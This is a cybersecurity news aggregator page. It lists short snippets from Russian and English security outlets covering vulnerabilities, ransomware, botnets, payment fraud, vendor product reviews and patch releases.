Cybersecurity
A collection of cybersecurity resources
In Russian 🇷🇺
Securitylab
Latest post 13 hours ago
An ion superhighway: a new technology will speed up battery charging tenfold

Inspiration from nature has opened the way to new technologies.

13 hours ago @ securitylab.ru
4 billion years of solitude: meet LUCA, the ancestor of all life on Earth

Genetic analysis has shown the link between modern organisms and the distant past.

13 hours ago @ securitylab.ru
The mathematics of light: physicists have drawn a detailed portrait of the elusive photon

Light + matter = ... ?

14 hours ago @ securitylab.ru
Ancient genes come alive: scientists have created new mice using the DNA of single-celled ancestors

Single-celled organisms reveal the secrets of stem cells.

14 hours ago @ securitylab.ru
Ghost Tap: large-scale bank card fraud has become a reality

The case where your own phone is the hackers' main tool.

16 hours ago @ securitylab.ru
Burn after reading: how Google erases evidence and dodges lawsuits

The corporation is accused of deliberately deleting evidence and concealing facts.

16 hours ago @ securitylab.ru
E-democracy, Russian style: only .ru domains for citizens' appeals

The State Duma is discussing a bill that changes the procedure for filing applications.

17 hours ago @ securitylab.ru
By 2026 Russia will have a unified anti-fraud system

The Ministry of Digital Development has announced the creation of a new platform for protection against attacks.

17 hours ago @ securitylab.ru
When advertising goes too far: BuzzFeed is accused of monetizing tragedies

Inappropriate buttons have been spotted on images in shocking articles.

18 hours ago @ securitylab.ru
Hacked devices for sale: proxy marketplaces are gaining popularity among hackers

How are vast malicious networks of tens of thousands of IoT devices built?

18 hours ago @ securitylab.ru
IT billionaires must share with universities: three accreditation criteria

Business will be obliged to support education

19 hours ago @ securitylab.ru
Pirates on your porch: a new epidemic of theft has swept the US

Why do packages no longer reach their owners?

19 hours ago @ securitylab.ru
Japan opens the door to Five Eyes: what does this mean for security in Asia?

A new era of partnership is forming a unique strategic alliance.

19 hours ago @ securitylab.ru
SMS will have to wait: the Ministry of Digital Development has proposed blocking messages during calls

The new initiative is aimed at protection against fraudsters.

20 hours ago @ securitylab.ru
From hospitals to tribes: how the Phobos virus terrorized entire continents

The creator of the ransomware will stand trial.

20 hours ago @ securitylab.ru
Anti-Malware
Latest post 20 hours ago
What kind of cyber immunity is being developed in Russia and abroad

Another ten years later, in 2022, at the Kaspersky Security Day event in Khakassia, it was proposed to name November 11 Cyber Immunity Day.

It is known that in developing the approach, Kaspersky Lab relied on the following basic elements: the "secure by design" principle, i.e. end-to-end security assurance during design and throughout the product life cycle.

Hype cycle for emerging technologies (Gartner, 2024). Cyber immunity based on FLASK. Despite a certain kinship, Kaspersky Lab's approach and the DIS concept are completely different.

We have already noted earlier that Kaspersky Lab's approach to cyber immunity is based on the use of the FLASK technology.

Политик…

20 hours ago @ anti-malware.ru
Seven years of Federal Law 187-FZ: how are things with CII security?

What is happening with CII security in 2024?

Egor Kulikov, head of CII and ICS security, K2 Cybersecurity.

Progress of import substitution in CII. One of the main problems in CII protection remains dependence on imported hardware and software.

Conclusions. The CII protection industry has come a long way in seven years.

22 hours ago @ anti-malware.ru
Can ARM processors take market share from Intel and AMD?

The emergence of Linux on ARM, once SoCs reached a certain level of performance, allowed such systems to enter the server market as well.

Currently the minimum price of a Windows laptop on ARM is about 700 US dollars, while a system of comparable performance on x86-64 costs half as much.

On Linux the situation with ARM software is not as acute, but on this platform too a significant share of commercial programs do not support the architecture.

Conclusions. PCs on the ARM architecture certainly have prospects, especially against the backdrop of the problems that Intel and (to a lesser extent) AMD are experiencing.

On the other hand, ARM still has objective difficulties of its own related to the development of the Windows ecosystem for …

1 day, 21 hours ago @ anti-malware.ru
How the technological progress of Russian DBMSs is changing the landscape of the IT industry

Realities of the DBMS market in Russia. After the departure of Western vendors the DBMS market faced difficulties, but it is now beginning to recover, notes Evgeny Yarosh.

New ideas and technologies, such as cloud computing and microservice architecture, make it possible to solve modern tasks effectively, including processing large volumes of data and ensuring high availability.

Every migration project is unique, since each organization has its own specific requirements, data structures and business processes, notes Evgeny Yarosh.

The key role in a successful migration is played by a competent engineer with deep knowledge of both the technology and the specifics of the business.

Conclusions. The development of Russian…

2 days ago @ anti-malware.ru
Review of Astra Linux 1.8, the eighth generation of the secure Russian operating system

Let us look at what the developers have added in Astra Linux 1.8, but first let us outline its key capabilities.

Infographic of device and processor support in Astra Linux. The Astra Linux edition for workstations is one of the most in demand on the market.

Astra Linux deployed in a bank terminal. Among the advantages of Astra Linux Embedded: support for the main processor architectures and popular hardware components.

The Astra Proxima theme in Astra Linux. The Astra Proxima theme is offered in three color variants: light, dark and service.

"System Settings" → "Account" in Astra Linux. Account settings are part of the large system settings section of Astra…

6 days, 22 hours ago @ anti-malware.ru
The growing role of digital financial assets (DFAs) in the Russian economy: new opportunities and risks

DFAs can be tied to traditional assets (for example, shares), but they can also exist independently of them.

Back in early 2020, DFAs in Russia were perceived as something exotic, associated with cryptocurrencies and lacking a clear legal status.

The regulatory framework for DFAs in Russia. Unlike traditional financial instruments, DFAs do not require complex and lengthy bureaucratic issuance procedures.

The path toward legal regulation of digital financial assets in Russia began in 2018.

In March 2024 Vladimir Putin signed a law permitting the use of DFAs in international payments.

1 week ago @ anti-malware.ru
Container security: the experience of the heavyweights of Russian cybersecurity

Maxim Morar, Orion soft. Threats and risks to container infrastructure. Artem Chernov highlighted the growing complexity of attack vectors, as well as attackers' focus on supply chains and container orchestrators.

Container security and standards. Nikita Ladoshkin noted that customers can rely on international standards and best practices for container security such as the CIS Kubernetes Benchmark, NIST 800-190 and PCI DSS.

The expert singled out three key aspects here: analysis of container network traffic for anomalous activity (network scanning, C&C, data exfiltration).

Kubernetes is gradually acquiring built-in security features, but in applications they are still a long way off…

1 week ago @ anti-malware.ru
WAF signatures in the age of artificial intelligence

How a signature-based WAF works. Signature-based analysis of application traffic consists of applying defined rules expressed as regular expressions.

On the latter one can find the most common WAF signatures for different types of vulnerabilities.

The OSI model. When comparing Anti-Bot and WAF there are fewer differences in functionality, but they are still present.

Conclusions. We have examined several methods of working effectively with a WAF: different protection scenarios and the prospects of training a WAF using artificial intelligence technologies.

Although the classical approach is still the priority and occupies most of the market, rapid technological development may in the future provide significant hel…

1 week, 2 days ago @ anti-malware.ru
How an enterprise browser helps cope with the risks of shadow IT

In any case, you will be interested to learn what risks shadow IT entails and whether an enterprise browser can handle such threats.

If an employee forgot or did not know how to revoke an invitation, confidential information may remain with employees who have left the company, which also creates leak risks.

The third option is to use an enterprise browser in which access to external services can be regulated and managed.

Enterprise browser versus shadow IT. First, with an enterprise browser you will not have to give up internet resources and services that the security team has not approved.

With either approach, a properly configured enterprise browser becomes a convenient tool…

1 week, 5 days ago @ anti-malware.ru
Review of MultiDirectory, an open-source directory service

MultiDirectory is a cross-platform, open-source directory service with a free license from the Russian vendor MULTIFACTOR.

MultiDirectory is compatible with various network protocols and services, which allows it to operate both on a local network and in a cloud environment.

Using MultiDirectory. The directory service from MULTIFACTOR is suitable for creating and administering corporate directories in companies with distributed structures across different sectors.

Working with the HRBOX cloud service via MULTIFACTOR and MultiDirectory. The MULTIFACTOR portal connects to the MultiDirectory directory system, which enables working with employee accounts through a centralized LDAP directory.

Прове…

1 week, 6 days ago @ anti-malware.ru
Hardening is the management of secure configurations

What hardening is and how it helps protect against threats. Hardening is the process of strengthening the security of computer systems and networks.

Hardening is seen as an important part of the process of implementing built-in security measures, which helps protect systems at all levels, added Vitaly Masyutin.

Hardening helps protect against known threats with minimal effort by eliminating or mitigating the most common risks, which in turn improves security.

Ensuring network security and hardening require knowledge and skills that ordinary administrators do not have.

Hardening is a continuous process that requires regular security audits and penetration tests to identify…

2 weeks ago @ anti-malware.ru
Computer-aided design (CAD) systems: what is available in Russia

The CAD market in Russia is only beginning to recover after the disappearance of the foreign vendors' products that dominated the "heavy" segment.

This led to a genuine tectonic shift in CAD development, not only in Russia but on a global scale.

The latest version, Delta Design 4, can run not only on Windows but also on Linux, including the domestic Astra Linux.

Meanwhile, the penetration of BIM technologies in Russia is estimated at only 26%, several times lower than, for example, in Britain or Singapore.

In a number of sectors, BIM in particular, no solutions have appeared whose functionality would match the level of foreign produ…

2 weeks ago @ anti-malware.ru
How to prepare infrastructure for cyberattacks

Organizational preparation: creating clear security norms and standards, regularly raising employee awareness of cyber threats, forming incident response teams, developing and implementing a set of security measures.

Adapting the strategy: the security strategy must be analyzed and updated in a timely manner in line with changes in the business and technological environment.

Positive Technologies also offers infrastructure security monitoring and audit services to detect and prevent attacks and to identify anomalous activity.

Attacks on infrastructure lead to serious consequences, damage reputation and result in the destruction of data.

However, …

2 weeks, 1 day ago @ anti-malware.ru
How to prepare a company's infrastructure for cyberattacks

Organizations need to ensure a comprehensive approach to security that includes both technological solutions and organizational changes.

A comprehensive approach to security includes the introduction of modern technologies such as intrusion detection and prevention systems, antivirus software and data encryption tools.

Preparing for cyberattacks. To ensure a company's security, its infrastructure must be prepared to repel attacks, notes Dmitry Kokorin.

Any company should have several action plans: for immediately after an incident, for containing the threat, and for the system recovery stage, added Mikhail Klimov.

In a rapidly developing…

2 weeks, 4 days ago @ anti-malware.ru
Review of the new capabilities of R-Vision VM 5.4, a Russian vulnerability management system

Let us look at scenarios for using R-Vision VM at the main stages of the vulnerability management process, paying attention to the new capabilities it offers.

Using R-Vision VM 5.4. The R-Vision VM system has an intuitive interface that lets you configure the vulnerability management process and adapt it to the needs of a particular organization in line with corporate standards and requirements.

Black-box check settings in R-Vision VM 5.4. Password brute-force checks make it possible to assess the strength of password protection on elements of the information infrastructure.

Vulnerability information in R-Vision VM 5.4. Dashboards. The preinstalled R-Vision VM monitoring dashboards …

2 weeks, 5 days ago @ anti-malware.ru
Habr: Infosec
Latest post 18 hours ago
What to do if your WAF can't handle JSON: a ready-made solution

Today we will tell you about a non-standard approach to protecting web applications with PT Application Firewall PRO (PT AF PRO).

My colleagues and I faced an interesting task: how to protect a vulnerable application from malicious JSON requests.

Every new specialist goes through a "baptism of fire": digging into the code, playing with WAF settings, carrying out an attack and configuring the defense.

However, in the case of PT AF PRO the only way out is to process the whole JSON document as a single block of text.

And if the WAF cannot work with JSON but request parameters still need to be checked, a regular expression is quite a suitable solution.

18 hours ago @ habr.com
Ransomware: not-a-virus, or why antivirus is not a panacea against ransomware attacks

Analyzing yet another incident involving a ransomware attack and hearing yet again the question "how can this be, we have antivirus!"

In this article we will talk about the increasingly frequent DсHelp attacks, examine this group's tactics and techniques, and also note why antivirus is not a panacea and how legitimate software can be used against you.

After a successful attack on the infrastructure, the attackers contact the victims by e-mail, Telegram or other means and demand that they purchase a password to regain access to the data.

The attackers also look for password information in readable files and directories using the search mechanisms built into operating systems, and also look for saved…

18 hours ago @ habr.com
[Translation] Reverse engineering the new iOS Inactivity Reboot feature

iPhones running iOS 18 are ordering other iPhones with older iOS versions to reboot over a wireless connection!

If the AppleSEPKeyStore kernel module detects that the iPhone is still powered on after a reboot should have occurred, a kernel panic is triggered.

In iOS 18.2 the string "inactivity_reboot" was changed to "inactivity_reboot_enabled", hinting at further potential changes in the new iOS 18.2 betas. Only one thing remained unclear to me: after how long does the inactivity reboot fire?

The latest version of Ghidra also has good support for the iOS kernel,…

18 hours ago @ habr.com
UserGate has unveiled a high-performance NGFW for large enterprise networks

UserGate, a leading Russian developer of an ecosystem of security solutions, has presented a new generation of NGFW-class solutions: UserGate DCFW (Data Center Firewall), a line of high-performance next-generation firewalls for large enterprise customers and data centers.

Features of UserGate DCFW. UserGate DCFW is a specialized NGFW for customers who need a high-performance, feature-rich and fault-tolerant solution to protect enterprise networks and data centers.

Another important distinction of UserGate DCFW is the use of Russia's first FPGA-based hardware accelerator for an NGFW.

The fans were designed by UserGate and can operate both …

20 hours ago @ habr.com
Neural networks, scammers and "mammoths": how artificial intelligence is changing cyber fraud

We will also talk about the prospects of identity verification technologies in a world where "trust, but verify" has turned into "don't trust, and double-check twice".

They made it possible to: automate fraud; increase scale, and with it the profitability of old, unprofitable schemes; make deception more realistic and convincing.

YouTube's moderators caught on too late: by the time it was removed, the video had sat at the top for several hours and a sizable sum had accumulated in the scammers' wallet.

Scammers, on the other hand, will certainly continue to hone their skills on both companies and ordinary people.

A single mention of passport-based internet access and blogger registration can get you pelted with tomatoes, and not without reason.

20 hours ago @ habr.com
Cybercriminal attacks in the Middle East: results and forecasts

The specifics of cyber threats: who attacks whom, and how. Cybercriminal attacks in the Middle East are distinguished by their more destructive nature.

In addition, from late 2023 through the second half of 2024 our experts observed a significant influence of the region's geopolitical situation on cybercriminal activity.

Which countries were targeted most often. If at the start of the conflict the hackers' targets were mainly Israel and Palestine, the attackers' activity later spread to other countries as well.

Hackers used spyware both to steal personal and financial data and to spy on political activists and journalists.

The problems are mainly due to insufficient protec…

22 hours ago @ habr.com
19 bugs in LLVM 19

LinalgOps.cpp 502. In the last function call arg1 is reused: bool tailInteger = isInteger(arg0) && isInteger(arg1) && isInteger(arg1); The code is hard to read, which is the cause of the typo.

And more little typos of the same kind: StringRef ARMAsmParser::splitMnemonic(StringRef Mnemonic, ....) { .... if (isMnemonicVPTPredicable(Mnemonic, ExtraToken) && Mnemonic != "vmovlt" && Mnemonic != "vshllt" && Mnemonic != "vrshrnt" && Mnemonic != "vshrnt" && Mnemonic != "vqrshrunt" && Mnemonic != "vqshrunt" && Mnemonic != "vqrshrnt" && Mnemonic != "vqshrnt" && Mnemonic != "vmullt" && Mnemonic != "vqmovnt" /*** <= ***/ && Mnemonic != "vqmovunt" && Mnemonic != "vqmovnt" /*** <= ***/ && Mnemonic != "vmovnt" && …

22 hours ago @ habr.com
The many kinds of Android App Links, Web Links and Deep Links. Understanding them and trying to break them

However, many people (as we did before writing this article) confuse the terms Deep Links, Web Links and App Links, which can lead to implementation errors and vulnerabilities.

To implement Deep Link support on Android, you need to add an appropriate intent-filter to the app manifest that defines which Activity will handle the given link.

This is where a detailed description of all the attacks and vulnerabilities arising from mistakes in setting up App Links was supposed to be.

The only thing we managed to achieve was turning App Links into ordinary Web Links, which causes the "disambiguation" dialog to appear.

Conclusion. The lack of domain verification for App L…

23 hours ago @ habr.com
[Translation] $23,000 for an authentication bypass, file upload and arbitrary file overwrite

However, I cannot disclose the program's name and domain, since I did not get permission to publish them.

After reading it (200,000 lines of code), I found that it also uses JWT for authentication.

And I discovered https://admin.test.com/upload , which returned 403 Forbidden.

At first I thought that was the end, since it was impossible to determine where my file had been uploaded.

Many files are hosted on xxxxxxxx.cloudfront.net, and as an attacker I can modify the contents of those files.

1 day, 12 hours ago @ habr.com
One step ahead: how Threat Intelligence unlocks the capabilities of SIEM, IRP and SOAR

Threat Intelligence draws data from all kinds of open and closed sources, from public databases to hacker forums and the dark web.

Integrating Threat Intelligence feeds helps allocate resources correctly and focus efforts on genuinely critical incidents, which reduces the load on the security team.

According to estimates by Threat Intelligence experts and the F.A.C.C.T. Digital Forensics Laboratory, incident response time is reduced by 10-40% when Threat Intelligence data is used.

Descriptions of the main collections: "Leaks" category. Accounts. Hackers use phishing websites and malware for PCs and Android to steal logins and passwords.

Threat Intell…

1 day, 21 hours ago @ habr.com
Security Week 2447: forecasts for 2025

An increase in the number of attacks on the central banks of various countries, including the national payment systems they support.

The number of attacks on smartphones aimed at stealing money will increase.

The number of such attacks on personal computers is declining, while the number of financial attacks on mobile devices doubled in 2024.

Last week Kaspersky Lab experts published a list of forecasts for the development of cyber threats in 2025.

Software flaws for which no patch exists thus remain an important tool for the organizers of attacks. Another forecast that came true was the mass use of machine learning technologies by cybercriminals.

2 days, 16 hours ago @ habr.com
Reconnaissance with Telegram bots

The bots covered in this article mainly concern reconnaissance on Telegram users.

Let's try a search of an account's history; it will cost 10 tickets.

For example, UserBox as a database for your own application, Unamer as an offensive bot for Telegram account reconnaissance, and likewise SangMata.

More useful articles on the topic: Analysis of Telegram accounts; Bots and services for reconnaissance of VKontakte data; Automating Telegram account lookup by phone number.

Simple people search via Telegram; Search by e-mail and nickname; OSINT: Reconnaissance in EUROPE. Useful OSINT tools in Telegram (always working links)

2 days, 23 hours ago @ habr.com
[Translation] Grandpa Panas's tales. The tale of how villains cut a back door into the penguin's kernels

And for such lovers of the old school the penguin kept a copy of his kernels in CVS, so as, you see, to give to this one and to that one.

And so one fine November day the proud penguin bird looks into his old chest, the one called CVS, and scratches his head with a flipper, for he sees a change in his kernel, but where it came from in that chest he cannot see at all.

And here is what he spotted in the code of the wait4() function: + if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) + retval = -EINVAL; The first time the penguin looked at this, he just shrugged.

And the penguin at first thought the same.

And in general, a tale is a lie, but there's a hint in it, a lesson for the good lad about the danger of mixing up the comparison and assignment operators; if you don't like it, don't list…

2 days, 23 hours ago @ habr.com
The rumor that China has broken modern cryptography with a quantum computer has been debunked

Experiments conducted on the D-Wave Advantage quantum computer made it possible to successfully carry out attacks on three representative SPN-structure algorithms, PRESENT, GIFT-64 and RECTANGLE, and to successfully search for integral distinguishers up to round 9.

The experimental results show that the quantum annealing algorithm outperforms traditional heuristic global optimization algorithms, such as simulated annealing, in its ability to escape local minima and in solution time.

This is the first practical attack on several full-scale SPN-structure symmetric cipher algorithms using a real quantum computer.

It is mainly used to solve…

3 days, 18 hours ago @ habr.com
The 6P information security concept

In such cases I propose the "6P" concept, a simple and effective approach that helps focus on five main aspects of information security and thereby raise the company's level of protection.

Personnel Awareness. I am absolutely convinced that employee awareness is one of the most important aspects of information security.

Even the most expensive and sophisticated technologies cannot protect a company if people do not understand what security is and how they can contribute to it.

Even the most advanced technical measures can be useless if staff are not aware of threats and do not follow basic security rules.

Pentests are an important tool…

4 days, 16 hours ago @ habr.com
Хакер Хакер
последний пост 12 часов назад
The Ngioweb botnet used thousands of devices as residential proxies

Researchers have unravelled the infrastructure of the Ngioweb botnet, which supplies tens of thousands of proxies to the NSOCKS hacker service and was first discovered back in 2017.

Since then, several security companies have noted that many NSOCKS proxies are directly linked to the Ngioweb botnet, although far from all of its command-and-control servers could be found.

The Ngioweb botnet serves roughly 80% of the 35,000 proxies spread across 180 countries.

In particular, these C&C servers check the bots' bandwidth and connect them to a backconnect server that makes them available to NSOCKS.

According to the experts, the operations of Ngioweb and NSOCKS are currently disrupted, after…

12 hours ago @ xakep.ru
Hackers claim to have stolen Ford customer data

Hackers have published 44,000 records containing Ford customer information on BreachForums.

The company said it is already investigating the possible data leak.

The post appeared on BreachForums last weekend: a hacker using the handle EnergyWeaponUser claimed that he and another well-known threat actor (IntelBroker) breached Ford in November 2024 and stole the data.

Recall that in recent months alone IntelBroker has claimed responsibility for attacks on companies such as Cisco, Nokia and T-Mobile, and has leaked data stolen from them.

As a result, 44,000 Ford customer records were made publicly available, containing full names, physical addresses, purchase data, dealer information…

13 hours ago @ xakep.ru
Attack by SMS. How we found a vulnerability in a popular GSM modem and escalated it to RCE

We discovered a heap overflow vulnerability in its firmware when processing Secure UserPlane Location (SUPL) protocol messages delivered as SMS.

This bug allows arbitrary code execution at the level of the modem's operating system with maximum privileges; sending just five SMS messages through the carrier's network is enough.

Even an approximate list of affected devices is hard to compile, since the modem model is not always stated in the documentation.

We could not read memory or debug the firmware, but we found that on a crash, data we control ends up in register R0.

To automate the process we built a test rig, and in the end reading and…

18 hours ago @ xakep.ru
Helldown ransomware breaks into Zyxel firewalls

A ransomware strain named Helldown has been discovered that penetrates corporate networks through vulnerabilities in Zyxel firewalls.

Helldown was first described by Cyfirma analysts in summer 2024, and in October researchers at Cyberint were already reporting on its activity.

According to them, while this ransomware is not yet among the major players on the extortion "market", it is quickly gaining momentum, and reports of new victims keep appearing on the attackers' site.

While studying Helldown's activity, Sekoia analysts found that at least eight victims listed on the ransomware site were using Zyxel firewalls as IPSec VPN access points at the time of the attacks.

Based on this data, the specialists…

19 hours ago @ xakep.ru
Leaked documents show which phones Graykey can break into

The documents list not only the iOS devices against which Graykey is or is not effective, but also Android devices.

The documents also show that Graykey is less effective against iPhones running beta versions: the tool does not work against various beta versions of iOS 18.1 on all current iPhone models.

It is unknown whether this is because the developers simply had not had time to work out attacks against iOS 18.1 when the document was created, or because security was noticeably improved in version 18.1.

Graykey's capabilities against Android devices are far more varied, owing to the significant differences between devices from different manufacturers.

AFU means…

21 hours ago @ xakep.ru
Apple patches two 0-day vulnerabilities exploited in attacks

Apple has released emergency patches for two zero-day vulnerabilities that were already being exploited in attacks on Intel-based Mac systems.

The 0-days were found in the macOS Sequoia components JavaScriptCore (CVE-2024-44308) and WebKit (CVE-2024-44309).

Both issues posed a threat only to Intel-based Mac systems and were fixed in macOS Sequoia 15.1.1.

Since the same vulnerable components are present in Apple's other operating systems, patches were also released for iOS 17.7.2 and iPadOS 17.7.2, iOS 18.1.1 and iPadOS 18.1.1, and visionOS 2.1.1.

Counting these vulnerabilities, Apple developers have now fixed six 0-day bugs in 2024.

23 hours ago @ xakep.ru
More than 1,400 WhatsApp users were hacked with the Pegasus spyware

It has emerged that the Israeli company NSO Group, which develops spyware (including the notorious Pegasus), used several 0-day exploits for WhatsApp.

Several years ago we devoted a separate article to Pegasus and NSO Group, after public attention was drawn to this commercial spyware and the abuses associated with it.

In May 2019, WhatsApp representatives found that Eden had been used by NSO Group clients to attack roughly 1,400 user devices.

Having discovered these attacks, WhatsApp developers fixed the vulnerabilities Eden relied on and disabled NSO Group's WhatsApp accounts.

And the deployment of the spy…

1 day, 12 hours ago @ xakep.ru
In Switzerland, scammers are using paper mail for attacks

Switzerland's National Cyber Security Centre (NCSC) has warned that malware is being distributed through the country's postal service: people are receiving paper letters with malicious QR codes.

The letters invite recipients to scan the QR code and download a "Severe Weather Warning App" for Android that imitates the genuine Alertswiss weather app.

The app is hosted not on the official Google Play store but on a third-party site, and it conceals a variant of the Coper trojan, first discovered back in 2021.

Given that sending one such letter in Switzerland costs about 1.35 dollars, it can be assumed that the scammers used the letters…

1 day, 13 hours ago @ xakep.ru
Fake AI image and video generators spread the Lumma and AMOS stealers

These fake image generators infect Windows and macOS with the Lumma and AMOS malware, which is then used to steal credentials and cryptocurrency wallet information.

Recall that Lumma is an infostealer for Windows, and AMOS is one for macOS.

Clicking on such an image or video takes the user to the fake EditProAI site: editproai[.

It is therefore recommended to reset all credentials immediately, setting new and unique passwords for all sites and services.

It is also recommended to enable multi-factor authentication, especially on cryptocurrency exchanges, email services, banks and other important sites.

1 day, 15 hours ago @ xakep.ru
Kerberoasting for FreeIPA. How I looked for domain access and found a CVE

The most entertaining bugs can be found where nobody expects them, for example in popular access management solutions such as FreeIPA.

FreeIPA is a platform for managing user identity and access on a network, often used for centralised control of permissions and authentication.

When, during a pentest, I obtained an account from a FreeIPA domain, it turned out that the account had almost no privileges.

Remembering the password-guessing method known as Kerberoasting, I launched hashcat, but that did not work either, even with a known password for my user.

I also found that FreeIPA only works with AES256, which is sad.

1 day, 19 hours ago @ xakep.ru
0-day vulnerabilities fixed in the Russian VINTEO video conferencing system

Detailed traffic analysis showed that two dangerous vulnerabilities in the VINTEO video conferencing (VCS) system were used for the breach.

In the end it turned out that the attack used two 0-day vulnerabilities at once.

The first involved SQL injection (BDU:2024-08421, CVSS 3.0 score 9.8), and the second (BDU:2024-08422, CVSS 3.0 score 8.1) involved arbitrary code execution with maximum privileges on the system.

The combination of these problems allowed attackers to execute malicious code on the system without authorisation.

But thanks to the recording of the original traffic in PT NAD, during the investigation we were able to establish the exploitation vector of a previously unknown vulnerability that the attackers used…

1 day, 21 hours ago @ xakep.ru
Phishers are increasingly using SVG attachments

Researchers have noticed that attackers are increasingly attaching files in the SVG (Scalable Vector Graphics) format to their emails.

When opened in a browser, such a file renders the graphics described in its code.

Attackers have been hiding malicious code in SVG files for many years.

Now, however, MalwareHunterTeam and Bleeping Computer report that they have found signs of a new campaign (1, 2) and indications that attackers are increasingly turning to SVG files in their phishing operations.

SVG attachments with embedded JavaScript were also observed, used to automatically redirect the browser to phishing sites as soon as the image is opened.

1 day, 23 hours ago @ xakep.ru
T-Mobile was breached during the recent attack on telecoms

"At present it is known that [the attack did not have] a significant impact on T-Mobile's systems and data, and we have no evidence that our customers' information was affected," T-Mobile told The Wall Street Journal.

Moreover, journalists wrote that the attackers were able to wiretap the phones of senior US national security officials and politicians, as well as steal call logs, text messages and even audio recordings.

However, Cisco representatives state that they found no signs that their equipment was compromised during these attacks.

For example, in January 2023 the company reported that hackers had stolen the personal information of 37 million of its cus…

2 days, 15 hours ago @ xakep.ru
Botnet exploits a 0-day vulnerability in GeoVision devices

The Shadowserver Foundation has discovered a botnet that attacks a zero-day vulnerability in end-of-life GeoVision devices in order to use them for DDoS attacks and cryptocurrency mining.

According to the researchers, the botnet uses a variant of the Mirai malware, which is typically used to build DDoS platforms or for mining.

The issue was assigned CVE-2024-11120 (CVSS score 9.8) and was discovered by The Shadowserver Foundation.

According to The Shadowserver Foundation, around 17,000 GeoVision devices vulnerable to CVE-2024-11120 can currently be found on the internet.

Most of them are in the US (9,100), followed by…

2 days, 17 hours ago @ xakep.ru
HTB Axlle. Escalating privileges via StandaloneRunner

Reference: port scanning. Port scanning is the standard first step in any attack.

It lets the attacker learn which services on the host accept connections.

Based on this information, the next step towards obtaining a foothold is chosen.

The best-known scanning tool is Nmap.

You can improve its results with the following script:

#!/bin/bash
# Fast scan of the full port range, then collect the open port numbers as a comma-separated list
ports=$(nmap -p- --min-rate=500 "$1" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
# Detailed scan (-A) of only the ports found open
nmap -p "$ports" -A "$1"

2 days, 18 hours ago @ xakep.ru
In English 🇺🇸
The Hacker News
last post 1 hour ago
NodeStealer Malware Targets Facebook Ad Accounts, Harvesting Credit Card Data

Threat hunters are warning about an updated version of the Python-based NodeStealer that's now equipped to extract more information from victims' Facebook Ads Manager accounts and harvest credit card data stored in web browsers.

The latest analysis from Netskope shows that NodeStealer artifacts have begun to target Facebook Ads Manager accounts that are used to manage ad campaigns across Facebook and Instagram, in addition to striking Facebook Business accounts.

"We recently found several Python NodeStealer samples that collect budget details of the account using Facebook Graph API," Michael Alcantara explained.

"The malware gathers personal data and targets Facebook business accounts, pot…

1 hour ago @ thehackernews.com
Ghost Tap: Hackers Exploiting NFCGate to Steal Funds via Mobile Payments

Threat actors are increasingly banking on a new technique that leverages near-field communication (NFC) to cash out victim's funds at scale.

The technique, codenamed Ghost Tap by ThreatFabric, enables cybercriminals to cash out money from stolen credit cards linked to mobile payment services such as Google Pay or Apple Pay by relaying NFC traffic.

"This means that even without your physical card or phone, they can make payments from your account anywhere in the world."

Once in possession of the card details, the threat actors move to link the card to Google Pay or Apple Pay.

This is accomplished by means of a legitimate research tool called NFCGate, which can capture, analyze, or modify NF…

18 hours ago @ thehackernews.com
NHIs Are the Future of Cybersecurity: Meet NHIDR

The Rise of Non-Human Identities in Cybersecurity: By 2025, non-human identities will rise to be the primary attack vector in cybersecurity.

Introducing NHIDR: Recognizing the unique challenges posed by NHIs, Entro developed Non-Human Identity Detection and Response (NHIDR) to address this critical security gap.

Proactive Security for a New Era: NHIDR represents a paradigm shift from reactive to proactive security.

Conclusion: NHIDR technology is revolutionizing cybersecurity by providing real-time detection, automated responses, and a proactive approach to securing non-human identities.

With NHIDR, organizations can safeguard their assets, maintain compliance, and stay ahead of the threat landscap…

20 hours ago @ thehackernews.com
Decades-Old Security Vulnerabilities Found in Ubuntu's Needrestart Package

Multiple decade-old security vulnerabilities have been disclosed in the needrestart package installed by default in Ubuntu Server (since version 21.04) that could allow a local attacker to gain root privileges without requiring user interaction.

The vulnerabilities are believed to have existed since the introduction of interpreter support in needrestart 0.8, which was released on April 27, 2014.

However, in CVE-2024-11003 needrestart passes attacker-controlled input (filenames) to Module::ScanDeps and triggers CVE-2024-10224 with root privilege.

"These vulnerabilities in the needrestart utility allow local users to escalate their privileges by executing arbitrary code during package install…

22 hours ago @ thehackernews.com
Microsoft Launches Windows Resiliency Initiative to Boost Security and System Integrity

Microsoft has announced a new Windows Resiliency Initiative as a way to improve security and reliability, as well as ensure that system integrity is not compromised.

One of the most important features is Quick Machine Recovery that's expected to be available to the Windows Insider Program community in early 2025.

In another noteworthy update, Microsoft said it's introducing new capabilities that will allow security tools to be run in user mode, just like regular apps, as opposed to relying on kernel access.

Redmond further said it's working with endpoint security partners to take specific steps to bolster resilience as part of what's called the Microsoft Virus Initiative (MVI).

"This event …

1 day ago @ thehackernews.com
China-Backed Hackers Leverage SIGTRAN, GSM Protocols to Infiltrate Telecom Networks

Cybersecurity company CrowdStrike is tracking the adversary under the name Liminal Panda, describing it as possessing deep knowledge about telecommunications networks, the protocols that undergird telecommunications, and the various interconnections between providers.

The threat actor's malware portfolio includes bespoke tools that facilitate clandestine access, command-and-control (C2), and data exfiltration.

"SGSNs are essentially GPRS network access points, and the emulation software allows the adversary to tunnel traffic via this telecommunications network."

The end goal of these attacks is to collect network telemetry and subscriber information or to breach other telecommunications ent…

1 day ago @ thehackernews.com
Apple Releases Urgent Updates to Patch Actively Exploited Zero-Day Vulnerabilities

Apple has released security updates for iOS, iPadOS, macOS, visionOS, and its Safari web browser to address two zero-day flaws that have come under active exploitation in the wild.

Not much is known about the exact nature of the exploitation, but Apple has acknowledged that the pair of vulnerabilities "may have been actively exploited on Intel-based Mac systems."

The updates are available for the following devices and operating systems: iOS 18.1.1 and iPadOS 18.1.1 - iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and l…

1 day, 3 hours ago @ thehackernews.com
Oracle Warns of Agile PLM Vulnerability Currently Under Active Exploitation

Oracle is warning that a high-severity security flaw impacting the Agile Product Lifecycle Management (PLM) Framework has been exploited in the wild.

The vulnerability, tracked as CVE-2024-21287 (CVSS score: 7.5), could be exploited sans authentication to leak sensitive information.

"If successfully exploited, this vulnerability may result in file disclosure."

There is currently no information available on who is exploiting the vulnerability, the targets of the malicious activity, and how widespread these attacks are.

